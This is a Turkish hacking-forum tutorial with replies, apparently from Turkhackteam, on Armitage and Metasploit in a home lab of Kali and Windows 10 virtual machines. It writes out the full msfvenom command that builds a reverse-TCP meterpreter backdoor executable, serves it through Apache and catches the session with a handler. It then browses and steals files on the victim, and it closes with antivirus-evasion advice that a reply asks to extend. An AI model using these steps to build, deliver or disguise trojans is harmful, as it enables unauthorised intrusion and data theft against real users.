Sızma Testlerinde Armitage Kullanımı

ѕeleɴια

İstihbarat Tim
18 May 2018
2,042
20


Armitage nedir demeden önce bazı kavramları bilmemiz gerekiyor. Konuda konu hakkında sıfır bilgisi olanlar için en iyi halk diliyle konuşacağım.

Öğrenmemiz Gereken Kavramlar

[email protected] : [email protected], bir sistemde açık olduğunu sistemdeki o açığı hackleyerek, sömürerek kanıtlamaya işe yarayan bir araç tooldur. Sızma testleri yani Penetration Testlerde kullanılan popüler bir yazılımdır. İçinde bulundurduğu yazılımlar ile sistemlerin açıklarını hacklememizi onlara sızmamızı sağlar. İçinde bulundurduğu yazılımlara biz exploit diyoruz..


Exploit : Exploit en kısa şekilde sistemdeki açıklardan yararlanmak onları test etmek , hacklemek için yazılmış scriptler yazılımlardır.


Payload : Konu içinde sıkça değineceğimiz bir terim. Bir sistemde açık tespit edildikten sonra o sisteme sızılması için hedef sisteme bir şekilde yükletilen yazılımdır. Bu yazılım hedef sistemimiz ile hacker arasında iletişim kurulmasını sağlar.


P6LiGE.png


Armitage Nedir?

Artık armitage konusunda bir şeyler yazabilirim. Armitage bahsi geçen [email protected] programının görsel arayüz halinde çalışmasını sağlayan oldukça faydalı bir programdır armitage. Armitage linux işletim sistemi konusunda yeni olanlar için, siber güvenliğe yeni adımlar atanlar için önerilmektedir. Konu içinde gerekli sistemlerin kurulumunu yaptıktan sonra armitage üzerinden bir sızma testi deneyi yaparak daha iyi anlamanızı sağlayacağım.


P6LiGE.png


Gerekli Sistemleri Kuralım


Sanal makine ile bir linux işletim sistemi kuracağız. Kullanacağımız armitage linux sisteminde çalıştıracağız. Daha sonra birde sanal makine olarak bir windows kuracağız ve o windows'a sızmaya çalışacağız.
P6LiGE.png


Linux İndirmek

TIKLA

Tıkla yazan yere tıklayın. Link uzun olduğundan kötü bir görünüm olmasın diye böyle bir şey yaptım. Tıkladıktan sonra karşınıza çıkacak çıktı;


3QEPl0Vk.png


Çok fazla bir yazı çıktı. Bunların hepsi bizi ilgilendirmiyor. İlgilenmemiz gereken ( + KALI LINUX VİRTUALBOX IMAGES ) olan kısım. Virtual box sanal makinelerimizi çalıştıracağımız program görevi görecek. ( + ) butonuna basın.

2q0Rkx.png


Ekran bu şekilde gelmeli. Bu görünüm değişiklik gösterebilir çünkü web sitesi güncellenmektedir. Bu kısımda bilgisayarınızın bit değerine göre kali linux'u indireceksiniz. Bilgisayarın kaç bit olduğuna bakmak için ( Windows arama çubuğuna Hakkında yazın ve bilgisayarınız hakkında seçeneğine tıklayın, sistem türü kısmında kaç bit olduğu görünecek x64 64 bit, x32 32 bit şeklinde. ) Bit değerini öğrendikten sonra eğer 64 bit ise Kali Linux VirtualBox 64bit(ova) yazısının üzerine tıklayın, 32 bit ise bir altındakine.


P6LiGE.png

Virtual Box Kurulum

Kali inerken bir yandan vbox indirelim.

TIKLA

Tıkladıktan sonra karşınıza çıkacak sayfadan Windows hosts'a tıklayarak setup dosyası inecektir. Setup indikten sonra next next yaparak kurulum basit bir şekilde tamamlanır.

P6LiGE.png

Nat Ağı Kurulumu

Vbox ve kali indikten sonra vbox'ı açın. Virtual box içine bir ağ seçeneği kuracağız. Bu seçenek sayesinde linux makinemiz kendiliğinden internete bağlanacak.

Virtual box'un sayfasından bu eklenti paketini indireceğiz.

TIKLA

Bu sayfadan VirtualBox 6.1.22 Oracle VM VirtualBox Extension Pack yazan yerin altındaki All Supported Platforms'a basıp o paketi de indireceğiz.

P6LiGE.png

Kurulumlar

Tüm bu indirme işlemleri bittikten sonra ve virtual box'u kurduktan sonra. İndirdiğimiz o pakete tıklayacaksınız ve kendiliğinden virtual box açılacak. Çıkacak olan pencereden Yükle seçeneğine tıklayın. Bir yazı çıkacak en alta inin ve kabul et butonuna basın. Kabul et butonu silik bir halde görünebilir bunun sebebi okumamızı istemesi metni en aşağısına inerseniz düzelir. İşlem bitince artık paketimiz kuruldu şimdi resimli Linux kurulumuna geçelim.

P6LiGE.png

Kaliyi Kurmak

Virtualbox'u açtıktan sonra karşımıza gelecek çıktı;

1g6MKAD.png


Burdan içe aktar seçeneğine tıklayın.




Kali dosyamızın olduğu yerden kali dosyamızı seçip Aç butonuna tıklayın.
Daha sonra çıkacak bölümde bize bazı ayarlar var. Default geliyor daha sonra değiştirebiliyoruz. Bu bölümde olduğu gibi İçe aktar butonuna tıklayın. Ve içe aktarma başlayacak.


P6LiGE.png

İçe Aktarma Bittikten Sonrası

KLBXk1V.jpg


Makinemiz seçili haldeyken üstdeki ayarlar butonuna tıklayın ve böyle bir yer gelecek. Burdan bazı ayarları yapılandıracağız. İlk olarak Ağ kısmından ayarları alt da vereceğim resimdeki gibi yapın.

9xiY3qM.png


Eğer geçersiz ayarlar algılandı gibi bir hata alıyorsanız. BIOS sanallaştırma etkinleştirmeli ve Hyper-v desteği açmalsınız. Bunu internetden araştırabilirsiniz. Ayarları böyle yaptıktan sonra tamam basabilirsiniz. Eğer sisteminiz yetersiz ise sistem bölümünden ram ve işlemciyi düşürebilirsiniz. Ama min 1gb ram gerekir. Sonra Başlat butonuna tıklayın. Sanal makine açılacak.

59jvB.jpg


Default username ve pass kali dir. Hem useranme e kali hem de sifreye kali yazın.

NOT: KLAVYE İNGİLİZCE OLDUĞU İÇİN "i" yerine "ı" basın.

Linux açıldı ekranı büyütebilirsiniz. Ekran normale dönecektir.

qFOxVs.png


Sanal makinemiz bu şekilde. Henüz sızma testine başlamayacaksınız. Önce size sanal bir windows kurduracağım. Daha sonra sızma testinde neler yapacaksınız bunu yazacağım. Sonra uygulamalı şekilde yazacağım ve sonuçları birlikte göreceğiz. Anlatacağım bu sızma testi deneyi armitage'in çok ufak bir kısmıdır armitage öğrenilmesi geniş bir araç.

P6LiGE.png

Sanal Windows 10 Kurmak

Yine aynı şekilde kali kurduğumuz gibi virtualbox'a windows kuracağız. İki sanal makine aynı anda çalıştırmak için yeterli bir ram 4-8gb ve yeterli bir işlemci gerek. Eğer yoksa kendi windows sisteminizde antivirüs programlarını ve defender'ı devre dışı bırakarak yaptıklarımı yapabilirsiniz.

Google'da Windows 10 virtual machine olarak aratın veya direkt vereceğim linke tıklayın

TIKLA

p8IU.png


Gelen sayfada seçenekleri bu şekilde yapın ve Download zip butonuna tıklayın. 1-2 saat arasında bir indirme yapılacak. İki tane aynı anda sanal makine çalıştırmak durumunda kalacaksınız. Ram yetersizse bilgisayar donabilir. Kendi windowsunuzda yapabilirsiniz ama güvenli olmayabilir.

P6LiGE.png

Kurulum Aşaması

İndirme bitince zip dosyasının kurulduğu yerden zip dosyasının içindeki dosyayı dışarı atın vevirtualbox'u açın ve yine içe aktar seçeneğine. İçe aktar yeri yoksa kali seçilidir Araçları seçin içe aktar seçeneği gelir. Kaliyi kurduğumuz gibi aynı şekilde windows'u da kurup ayarlarından ağ bölümünden Nat ağı seçip tümüne izin ver yapın.

P6LiGE.png

Sızma Testine Geçiyoruz

Tüm kurulumlar bitti. Sızma testine artık geçebiliriz.Önce hedef sistem ile iletişimimizi sağlayacak bir truva atı türevi trojan oluşturacağız.. Daha sonra bunu sanal win10 da çalıştırıp sızdıracağım. Sızdıktan sonrası sonuçlara baktıracağım ve bu yöntem ile sızma mümkünatı nedir bundan bahedeceğim.

P6LiGE.png

Trojan'i Oluşturmak

Biz bu trojanlere Backdoor arka kapı diyoruz. Çoğu kaynakta karşınıza backdoor olarak çıkacaktır. Backdooru msfvenom ile oluşturacağım.

Msfvenom:
Msfvenom, rapid7 firmasının yazmış olduğu bir backdoor builder olarak söyleyebiliriz. Kali Linux işletim sisteminde ön tanımlı olarak gelir.

P6LiGE.png

Yerel Ağ / Dış Ağ

Backdoor'u oluşturmadan önce bir konuya değinmek istiyorum. Yerel ağ ve dış ağ kavramı. Yerel ağ bizim kendi ağımızdır yani bizim bağlı olduğumuz ağ bizim yerel ağımızdır. Biz bu konuda saldırıyı yerel ağdaki cihazlara yapıyoruz. Dış ağ yani farklı bir ağda olan cihazlara yapmak için Ngrok gibi tünel servisleri kullanmalısınız ek bir bilgi olsun.

Kali Linux sanal makinenizi başlatın ardından kali linux un komut satırı olan terminal'i açın. Terminal üst panelde yani favori barda bulunuyor. Terminale bir kod yazacağız ve böylelikle backdoor oluşturacağız. Bundan önce ip adresinizi öğrenmeniz gerek.

Kod:
ifconfig



A8jIG7.png


Beyaz bir şekilde gösterdiğim yer sizin local ipniz. Backdoor oluştururken bu local ip ye ihtiyaç duyulacağı için onu kopyalayın.

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o /home/kali/Desktop/Backdoor.exe


Msfvenom ile -p payloadımızı seçtik. Paylodımız windows/meterpreter/reverse_tcp . LHOST= kısmına sizin local ipniz gelecek. LPORT= ise 444,4444,777,777,8080 gibi sayılar tercih ediliyor. Ben 4444 yaptım. -f dosyanın uzantısı ne olacak onu belirtiyoruz exe olacak. -o kayıt edeceğimiz yeri belirttik.

NOT: Klavye ingilizce olduğu için yazmakta sıkıntı çekebilirsiniz. Kod olarak setxkbmap tr yazın.

Msfvenom kodunu çalıştırınca masaüstüne backdoor gelecektir.

QOXo.jpg


Bu şekilde backdoor başarılı bir şekilde gelmiş. Şimdi yapmamız gereken önce /var/www/html dizininde root yani kök kullanıcı yönetici olmamız gerek. Neden? Backdooru oraya atacağız windows'a backdooru apache sunucusundan yükleyeceğiz.

P6LiGE.png

Nedir Apache

Apache bizim kendi yerel ağımızda açacağımız bir server bir sunucu görevi görecek. Orada backdoorumuz olacak, windowsta google da kalinin ip sini yazıp backdoor u ordan alacağız.

Kod:
sudo chown -R kal:kali /var/www/html/


Yazın sizden şifre isteyecek şifre kali dir. Sonra hiçbir şey olmayacak ama root olduk o dizinde. Apacheyi anlamak için apache servisini başlatıp bir bakalım ne varmış?

Kod:
sudo service apache2 start


Yazınca apache2 başlar. Kendi local ip adresinizi şimdi firefoxda kali de bulunan tarayıcıya yazıp açın.

nV9Jb.jpg


Başarılı olmuş. İşte biz bu sayfadaki bu resim yazıların html dosyasını silip yerine backdoor u koyacağız. Hemen yapalım. Baackdor'u kopyalayın ve resimleri izleyin.

Hr5sxB.jpg


JTK1tGc.jpg


İlk önce home klasörüne girdik. File system var ona geçtik. Var/www/html yolunu izledik buraya ulaştık. Bu dosyalara sağ tıklayıp move to trash çöpe atın. Ve içine backdoor u paste edin yapıştırın. Şimdi tekrar tarayıcıda local ip ye girelim.

0EsD.jpg


Bakın böyle bir sayfa. Burada da backdoor var. Windowsa burdan indireceğiz işte ikisi de nat ağında olduğu için winden apacheye erişeceğiz.

P6LiGE.png

Windows'a İndirmek

O zaman windows sanal makinesini de açın. Şifre Passw0rd! olacak

HJMlTdnG.jpg


Windows da böylelikle açıldı. Şimdi bu windowsun defenderını korumasını kapatalım. Oluşturduğumuz trojan anti virüs atlatmak için hiçbir işlem yapmadık onun hakkında fikirler vericeğim. Defender'ı kapatıp trojanı indirin windows a şimdi armitage kullanımına geçiyoruz.

P6LiGE.png

Armitage Kullanmak!

Kali terminalde armitage yazın. Eğer sudo apt install armitage derse sudo apt install armitage yazın yüklensin ve tekrar armitage yazın.

liwx4ohv.png


Connect olun.

GZNMgB.png


Yes butonuna tıklayın.

DXdiMk4E.png


Ve armitage açıldı şimdi tüm bunlar ne? Biz buarda çıkan bu klasör ikonu olan varlıklara bazı bilgiler vereceğiz. Örnek payload a windows/meterpreter/reverse_tcp atayacağız ve ona göre trojani yerel ağda dinlemeye alacak. Biri trojana tıkladdığında sızacağız. Yapalım.

Önce bu ikonlardan exploit i açıyoruz ve multi seçeneğini buluyoruz. Daha sonra handler seçeneğine çift tıklıyoruz ve çıkacak pencereyi şu şekilde doldurun. Öncelikle lhsot a local ip adresiniz olsun lport 4444 olacak. En altdaki shell yerine windows/meterpreter/reverse_tcp yazın. Ve launch bastığınızda artık trojan dinlenmeye aldı yani birinin tıklaması bekleniyor :) . Windowsda trojane çift yıklayın ve kaliye geçin bakalım ne olmuş?


6lwxXOzG.jpg


Bakın bir meterpreter session açıldı ve bir görsel geldi. O görsel sızdığımız makine. meterpreter session open olmaz artık hedef sistem ile iletişimimiz var ona sızdık demektir! . Şu anda istediğimz bir sürü işlem yapabiliriz. Dosyalarını çalmak ve cmd komut satırını bile açabiliyoruz. Nasıl mı?

Görseli olan makineye sağ tıklayın. Meterpreter 1 in üzerine gelin. Burada yapabileceğiniz her şey yazıyor. Mesela explore den browse file bakalım.

bkzj8oUu.jpg


C users yazan yere desktop yazınca oto olarak böyle geliyor. Yani görmek istediğiniz dizini yazın ve geliyor. Burdan dosyaları çalabilir kendimiz bir dosya oluşturabiliriz.

P6LiGE.png

Bu Yöntemle Bir Bilgisayara Sızmanın Mümkünatı Nedir?

Sadece bu yöntemle çok düşüktür. Fark ederseniz sizlere defender'ı kapattırdım buna anti virüs de dahil olsa daha sorun olacaktı. Antivirüs firmaları msf payloadlarını takip ediyor ve önlemler oluyor. Bundan dolayı antivirüsleri bypass etmek yani atlatmak için şu yöntemler izlenir;

>> Backdooru fudlamak
>> Sızılacak sistemin mimarisine göre bir backdoor oluşturmak
>> Backdooru çokça şifrelemek.

Bunlar anti virüsleri atlatabiliyor. MSF anti virüs bypass olarak bir araştırma yapabilir veya backdoor antivirüs bypass olarak da yapabilirsiniz. MSF yetersiz kalır daha atlatma olasılığı yüksek olan alternatifler bulunmakta.İyi forumlar.


 
Son düzenleme:

Kaptan Swing

İstihbarat Tim Asistanı
4 Ara 2020
128
0
son derece açık ve akıcı bir anlatım olmuş.. teşekkür ederim.. bu anlatımı ben bile rahatlıkla anladım.. peki bu trojan ı çeşitli sürprizlerle donatabilir miyiz? yani nasıl anti-virüs programlarını aşabiliriz...gibi.. pek yaratıcı değilim de bu konuda, bunun için de bir konu yapar mısınız?
 

ѕeleɴια

İstihbarat Tim
18 May 2018
2,042
20
son derece açık ve akıcı bir anlatım olmuş.. teşekkür ederim.. bu anlatımı ben bile rahatlıkla anladım.. peki bu trojan ı çeşitli sürprizlerle donatabilir miyiz? yani nasıl anti-virüs programlarını aşabiliriz...gibi.. pek yaratıcı değilim de bu konuda, bunun için de bir konu yapar mısınız?
Teşekkür ederim. Evet donatabiliriz. Bunun bir konusunu önümüzdeki hafta yapacağım.
 

kiss4u

İstihbarat Tim
9 Şub 2019
224
1
Armitage için pratik, sade ve anlaşılabilir bir anlatım olmuş, eline sağlık.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.